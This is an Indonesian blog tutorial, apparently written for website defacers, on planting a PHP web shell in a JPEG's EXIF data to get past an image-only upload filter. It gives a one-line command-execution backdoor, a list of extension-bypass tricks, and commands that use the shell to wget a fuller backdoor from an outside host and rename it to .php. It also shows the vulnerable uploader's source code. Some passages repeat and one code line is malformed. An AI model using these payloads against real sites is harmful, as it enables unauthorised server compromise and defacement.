Agar shell ane bisa nyangkut di site target khususnya untuk para defacer tidak rumit juga untuk proses exploitasinya hanya membutuhkan beberapa wejangan aja ok Lanjut simak ya aja ya di bawah ini :)
Bahan Bahan yang di butuh kan
Exif PILOT ( download di google banyak gan )
Exif TOOL ( WINDOWS / LINUX )
Shell Backdoor
Tamper data / burpsuite
Sebuah Tools yang bisa dan mampu di gunakan untuk menyisipkan suatu kata / script, tapi khususnya untuk para editor photo menambahkan hasil karya/nama dia dalam photo tersebut dengan tools ini.
Disini salah satu uploader yang memfilter ekstensi tertentu khususnya hanya .jpg .png .gif aja
Seperti kita lihat pada gambar di atas setelah ane upload beberapa ekstensi shell dan segala macem bypassnya
contoh : .phtml .php jpg .php.txt .php;_.fla .pjpeg .cin .shtml .pjpg.php.jpg
. Dari beberapa ekstensi bypass di atas tidak ada yang mampu menembus kalbu si uploader di karenakan terdeteksi/tercium bau nya si shell tersebut maka dari itu kita perlu sisipkan shell ke dalam gambar.
Ok pastikan sudah di install Exif Pilot Kalian
cari gambar yang mau di sisipkan shell
cari gambar yang mau di sisipkan shell
buka exif pilot
klik 2 kali pada gambar masukan source ( <?php system($_GET['SukaHatimu']);?> )
klik ok
Untuk lebih jelasnya lihat gambar di atas
jika berhasil seperti gambar di atas shell sudah tersisipkan di dalam gambar
open with notepad untuk memastikan
jika sudah coba upload shell mu
tara upload berhasil di site atas tadi :Djika berhasil seperti gambar di atas shell sudah tersisipkan di dalam gambar
open with notepad untuk memastikan
jika sudah coba upload shell mu
tara upload berhasil di site atas tadi :D
nah gimana dong kalau udah ke upload itu kan masih berbentuk gambar untuk eksekusi shellnya gimana ?
ok cekidot liat dan perhatikan code dari <?php system($_GET['gayhodus');?>
bisa di sebut gayhodus menjadi paramater dari hasil upload di atas untuk proses nya
ok cekidot liat dan perhatikan code dari <?php system($_GET['gayhodus');?>
bisa di sebut gayhodus menjadi paramater dari hasil upload di atas untuk proses nya
.php?gayhodus=uname < uname untuk check servernya apa
selanjutnya untuk upload shell
.php?gayhodus=wget link.com/shell.txt
.php?gayhodus=mv shell.txt ea.php
open dah di ea.php :D shell mu uploadeedddddddd
wget memanggil dari linkyang di panggill lah haha
berhubung di link itu ada yang hapus :D ya udah ane share segini aja dulu thanks for coming here
oke ada sedikit koreksi dari teman di group kalau tutorialnya kurang penjelasan
sebelumnya biar gak salah paham ane kasih source code dari uploader nya
sebelumnya biar gak salah paham ane kasih source code dari uploader nya
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
<?php
if(isset($_POST['submit'])) {
$name = $_FILES['file']['name'];
$tmp = $_FILES['file']['tmp_name'];
$allowed = array('jpg','png','gif','jpeg');
$exts = explode('.', $name);
if(!in_array($exts[1], $allowed)) {
echo 'Cuma Jpeg Doang Cok';
} else {
$info = getimagesize($tmp);
if(!empty($info)) {
if(move_uploaded_file($tmp, $name)) {
echo 'Ke Upload ==>>' .$name;
} else {
echo 'Upload Gagal Total';
}
} else {
echo 'Gambar Yang Salah';
}
}
}
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
<?php
if(isset($_POST['submit'])) {
$name = $_FILES['file']['name'];
$tmp = $_FILES['file']['tmp_name'];
$allowed = array('jpg','png','gif','jpeg');
$exts = explode('.', $name);
if(!in_array($exts[1], $allowed)) {
echo 'Cuma Jpeg Doang Cok';
} else {
$info = getimagesize($tmp);
if(!empty($info)) {
if(move_uploaded_file($tmp, $name)) {
echo 'Ke Upload ==>>' .$name;
} else {
echo 'Upload Gagal Total';
}
} else {
echo 'Gambar Yang Salah';
}
}
}
Dari source diatas bisa di pastikan filternya hanya mampu membaca format jpg png gif
disitu ada 3 pilihan jika proses upload berhasil makanya muncul ( KE UPLOAD )
jika upload gagal / bukan extensi yang di butuhkan akan muncul ( Upload Gagal Total/Cuma Jpeg Doank COK )
jika upload berhasil nama muncul ( Gambar yang salah ) itu berhasil bypass extensinya .jpg.php namun gambar salah karena dalam gambar tersebut masih terdeteksi sebuah shell
untuk lebih jelasnya lihat kembali ke Video nya bisa di cek Disini
Ingat Tidak Semua Website Bisa Dengan Tutorial di atas
Oke Sekian dari saya semoga dapet bermanfaat buat kalian semua thanks sudah berkunjung di blog saya